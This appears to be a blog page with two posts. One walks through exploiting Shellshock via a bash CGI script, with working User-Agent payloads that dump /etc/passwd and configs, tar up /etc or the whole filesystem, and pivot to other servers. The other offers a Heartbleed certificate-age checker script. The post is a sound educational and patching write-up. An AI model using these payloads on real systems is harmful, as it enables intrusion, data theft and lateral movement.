Posts in category security

Fun with cgi-bin and Shellshock

The setup

One of the simple examples of the Shellshock bug uses wget and overrides the user agent. For example:

USER_AGENT="() { : ; }; /bin/touch /tmp/SHELLSHOCKED"
wget -U "$USER_AGENT" http://example.com/cgi-bin/vulnerable.sh

(You can do it all as one line, but we're going to take USER_AGENT to the extreme, and setting it as a variable will make it clearer.)

You can create a simple CGI script that uses bash like this:

#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "<html><title>hello</title><body>world</body></html>"

and put it in your cgi-bin directory as vulnerable.sh, and then point the wget command above at it. (I will note for the sake of completeness that I do not recommend doing that on an internet-accessible system -- there are active scans for Shellshock running in the wild!)

The malicious wget above will, on systems with touch in /bin, create an empty file in /tmp.

For checking your systems, this is quite handy.
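What's actually happening: the webserver hands the User-Agent header to the CGI script as the HTTP_USER_AGENT environment variable, and a vulnerable bash executes the commands trailing the function definition when it imports that variable. You can simulate the whole exchange locally, no webserver needed (a sketch; the echo stands in for the CGI script):

```shell
# The webserver exports the User-Agent header as HTTP_USER_AGENT and then
# runs the CGI script with bash; a vulnerable bash executes the trailing
# commands while importing the variable. Simulated locally:
export HTTP_USER_AGENT="() { : ; }; /bin/touch /tmp/SHELLSHOCKED"
bash -c 'echo "CGI script runs here"'
# On an unpatched bash, /tmp/SHELLSHOCKED now exists; a patched bash
# refuses the import and nothing happens.
```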

Extend our flexibility

If we make the USER_AGENT a bit more complex:

USER_AGENT="() { : ; }; /bin/bash -c '/bin/touch /tmp/SHELLSHOCKED'"

We now can run an arbitrarily long bash script within the Shellshock payload.

One of the issues people have noticed with Shellshock is that $PATH is not set to everything you may be used to. With our construct, we can fix that.

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; touch /tmp/SHELLSHOCKED'"

We now have any $PATH we want.

Enter CGI again

What can we do with that? There have been a number of examples that use ping to talk back to a known server, or something along those lines. But can we do something a bit more direct?

Well, we created a CGI script in bash for testing this exploit, so the webserver is expecting CGI output from the underlying script. What if we embed another CGI script into the payload? That looks like

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: text/html\n\"; echo -e \"<html><title>Vulnerable</title><body>Vulnerable</body></html>\"'"

Now wget will get back a valid webpage, but it's a webpage of our own. If we are getting back a valid webpage, maybe we'd like to look at that page in our web browser, right? Well, in Firefox it's easy to change our USER_AGENT. To figure out what we should change it to, we run

echo "$USER_AGENT"

and get

() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:$PATH; echo -e "Content-type: text/html\n"; echo -e "<html><title>Vulnerable</title><body>Vulnerable</body></html>"'

We can then cut and paste that into the general.useragent.override preference on the about:config page of Firefox. (To add the preference in the first place, Right-click, New->String, enter general.useragent.override for the name and paste in the USER_AGENT value for the value.) Then we can point Firefox at http://example.com/cgi-bin/vulnerable.sh and get a webpage that announces the system is vulnerable. (I would recommend creating a separate user account for this so you don't inadvertently attempt to exploit Shellshock on every system you browse. I'm sure that when you research your tax questions on irs.gov, they'll be quite understanding of how it all happened.)

What can we do with our new vulnerability webpage? Perhaps something like this:

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: text/html\n\"; echo -e \"<html><title>Vulnerability report \`hostname\`</title><body><h1>Vulnerability report for \`hostname\`; \`date\`</h1><h2>PATH</h2><p>\$PATH</p><h2>IP configuration</h2><pre>\`ifconfig -a\`</pre><h2>/etc/passwd</h2><pre>\`cat /etc/passwd\`</pre><h2>Apache config</h2><pre>\`grep . /etc/httpd/conf.d/*.conf | sed \"s/</\&lt;/g\"\`</pre></body></html>\" 2>&1 | tee -a /tmp/SHELLSHOCKED'"

Let's break that down. The leading () { : ; }; is the key to the exploit. Then we have the payload of /bin/bash -c '...' which allows for an arbitrary script. That script, if formatted sanely, would look something like this

export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:$PATH;
echo -e "Content-type: text/html\n"
echo -e "<html><title>Vulnerability report `hostname`</title>
<body>
    <h1>Vulnerability report for `hostname`; `date`</h1>
    <h2>PATH</h2>
    <p>$PATH</p>
    <h2>IP configuration</h2>
    <pre>`ifconfig -a`</pre>
    <h2>/etc/passwd</h2>
    <pre>`cat /etc/passwd`</pre>
    <h2>Apache config</h2>
    <pre>`grep . /etc/httpd/conf.d/*.conf | sed "s/</\&lt;/g"`</pre>
</body></html>" 2>&1 | tee -a /tmp/SHELLSHOCKED'

That generates a report giving the server's:

  • hostname
  • local time
  • $PATH
  • IP configuration
  • content of /etc/passwd
  • apache configuration files

Not only does it send the report back to us, but it also appends a copy to /tmp/SHELLSHOCKED... just for good measure. This can be trivially expanded to run find / to generate a complete list of the files the webserver is allowed to see, or to run just about anything else the webserver has permission to do.
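A find-based variant of the payload might look like this (a sketch; text/plain this time, since the output is a file listing rather than HTML):

```shell
# Hypothetical payload: list everything the webserver's user can reach,
# discarding permission-denied noise on stderr.
USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: text/plain\n\"; find / 2>/dev/null'"
# Then, exactly as before:
#   wget -U "$USER_AGENT" -O file_list.txt http://example.com/cgi-bin/vulnerable.sh
```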

Heavier load

So we've demonstrated that we can send back a webpage. What about a slightly different payload? With this USER_AGENT

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; tar -czf- /etc'"

run slightly differently,

wget -U "$USER_AGENT" -O vulnerable.tar.gz http://example.com/cgi-bin/vulnerable.sh

we have now pulled all the content from /etc that the webserver has permission to read. Anything it does not have permission to read has been skipped. Only patience and bandwidth keep us from changing that to

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; tar -czf- /'"

and thus download everything on the server that the webserver has permission to read.

Boomerang

Arbitrary code execution can be fun. After all, why not browse via the webserver? (Assuming the webserver can get out again.)

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; wget -q -O- https://retracile.net'"

Oh, look. We can run wget on the vulnerable server, which means we can use the server to exploit Shellshock on another server. So with this USER_AGENT

USER_AGENT="() { : ; }; /bin/bash -c 'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\$PATH; echo -e \"Content-type: application/octet-stream\n\"; wget -q -O- -U \"() { : ; }; /bin/bash -c \'export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:\\\$PATH; echo -e \\\"Content-type: application/octet-stream\\n\\\"; wget -q -O- https://retracile.net\'\" http://other.example.com/cgi-bin/vulnerable.sh'"

we use Shellshock on example.com to use Shellshock on other.example.com to pull a webpage from retracile.net.

Inside access

Some webservers will be locked down to not be able to connect back out to the internet like that, but many services are proxied by Apache. In those cases, Apache has access to the other webserver it is proxying for, whether it is local or on another machine in its network. Authentication may be enforced by Apache before doing the proxying. In such a configuration, being able to run wget on the webserver would allow access to the proxied webserver without going through Apache's authentication.
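To make that concrete, a hypothetical configuration along these lines (all names invented) has Apache demand a password from outside visitors before proxying, while a Shellshock payload running wget against http://localhost:8080/ on the webserver itself reaches the backend directly, never touching the auth:

```apache
# Sketch: Apache authenticates, then proxies to an internal service.
<Location /internal/>
    AuthType Basic
    AuthName "Internal service"
    AuthUserFile /etc/httpd/htpasswd
    Require valid-user
    ProxyPass http://localhost:8080/
    ProxyPassReverse http://localhost:8080/
</Location>
```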

Conclusions

While the exploration of Shellshock here postulates a vulnerable CGI script, the vulnerability can be exploited even without CGI being involved. That said, if you have any CGI script that executes bash explicitly or even implicitly on any code path, the above attacks apply to you.

If you have any internet-facing systems, you'd better get them patched -- twice. The first patch sent out was incomplete; the original Shellshock is CVE-2014-6271 and the follow-up is CVE-2014-7169.

Heartbleed for users

There has been a great deal of commotion about The Heartbleed Bug, particularly from the point of view of server operators. Users are being encouraged to change all their passwords, but--oh, wait--not until after the servers get fixed.

How's a poor user to know when that happens?

Well, you can base it on when the site's SSL cert was issued. If it was issued prior to the Heartbleed announcement, the keys have not been changed in response to Heartbleed (but see update). That could be for a couple of different reasons. One is that the site was not vulnerable because it was never running a vulnerable version of OpenSSL. The other is that the site was vulnerable, and the vulnerability has been patched, but the operators of the site have not replaced their SSL keys yet.

In either of those two cases, changing your password isn't going to do much. If the site was never vulnerable, your account is not affected. If it was vulnerable, an adversary who got the private keys still has them, and changing your password does little for you.

So once a site updates its SSL cert, it then makes sense to change your password.

How do you know when that happens? Well, if you are using Firefox, you can click on the lock icon, click on the 'more information' button, then the Security tab, then the 'View Certificate' button, then look at the 'Issued On' line. Then close out that window and the previous window. ... For each site you want to check.

That got tedious.
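An openssl one-liner gets the same date without all the clicking (example.com here stands in for whatever site you care about):

```shell
# Fetch the site's certificate and print its issue date.
echo | openssl s_client -connect example.com:443 2>/dev/null \
    | openssl x509 -noout -startdate
```

That is still one invocation per site, though, so a script that does the date comparison for you helps.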

cert_age_check.py:

#!/usr/bin/python
import sys
import ssl
import subprocess
import datetime


def check_bleeding(hostname, port):
    """Returns true if you should change your password."""
    cert = ssl.get_server_certificate((hostname, port))
    task = subprocess.Popen(['openssl', 'x509', '-text', '-noout'],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    readable, _ = task.communicate(cert)
    issued = [line for line in readable.splitlines() if 'Not Before' in
        line][0]
    date_string = issued.split(':', 1)[1].strip()
    issue_date = datetime.datetime.strptime(date_string,
        '%b %d %H:%M:%S %Y %Z')
    return issue_date >= datetime.datetime(2014, 4, 8, 0, 0)


def main(argv):
    """Syntax: python cert_age_check.py <hostname> [portnumber]"""
    hostname = argv[1]
    if len(argv) > 2:
        port = int(argv[2])
    else:
        # 993 and 995 matter for email...
        port = 443
    if check_bleeding(hostname, port):
        sys.stdout.write("Change your password for %s\n" % hostname)
    else:
        sys.stdout.write("Don't bother yet for %s\n" % hostname)
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))

This script checks the issue date of the site's SSL certificate to see if it has been issued since the Heartbleed announcement and tells you if it is time to change your password. If something goes wrong in that process, the script will fail with a traceback; I'm not attempting to make this particularly robust. (Nor, for that matter, elegant.)

If you save a list of hostnames to a file, you can run through them like this:

xargs -n 1 python cert_age_check.py < account_list

So if you have a file with

bankofamerica.com
flickr.com

you will get

Don't bother yet for bankofamerica.com
Change your password for flickr.com

While I would not suggest handing this to someone uncomfortable with a command line, it is useful for those of us who support friends and family to be able to quickly determine which accounts we should recommend they worry about and which can wait.

UPDATE: There is a flaw in this approach: I was surprised to learn that the cert a CA provides to a website operator may have the same issue date as the original cert -- which makes it impossible for the user to determine whether the cert is in fact new. With that wrinkle: if you are replacing your cert due to Heartbleed, push your CA to give you a cert with a new issue date as evidence that you have fixed your security.

Something I mentioned elsewhere, but did not explicitly state here, is that even with a newly dated cert, a user still cannot tell if the private key was changed along with the cert. If the cert has not changed, the private key has not either. If the operator changes the cert, they will have changed the private key at that point if they are going to do so.

This gets us back to issues of trust. A security mechanism must have a way to recover from a security failure; that is widely understood. But Heartbleed is demonstrating that a security mechanism must include externally visible evidence of the recovery, or the recovery is not complete.

UPDATE: For this site, I buy my SSL cert through DreamHost. I had to open a help ticket to get them to remove the existing cert from the domain in their management application before I could get a new cert. (If you already have a valid cert, the site will let you click on buttons to buy a new cert, but it won't actually take any action on it. That is a reasonable choice in order to avoid customers buying duplicate certs -- but it would be nice to be able to do so anyway.) The response to my help ticket took longer than I would have liked, but I can understand they're likely swamped, and probably don't have a lot of automation around this since they would reasonably not foresee needing it. Once they did that, I then had to buy a new cert from them. I was happy to see that the new cert I bought is good for more than a year -- it will expire when the next cert I would have needed to buy would have expired. Which means that while I had to pay for a new cert, in the long run it will not cost me anything extra. And the new cert has an updated issue date so users can see that I have updated it.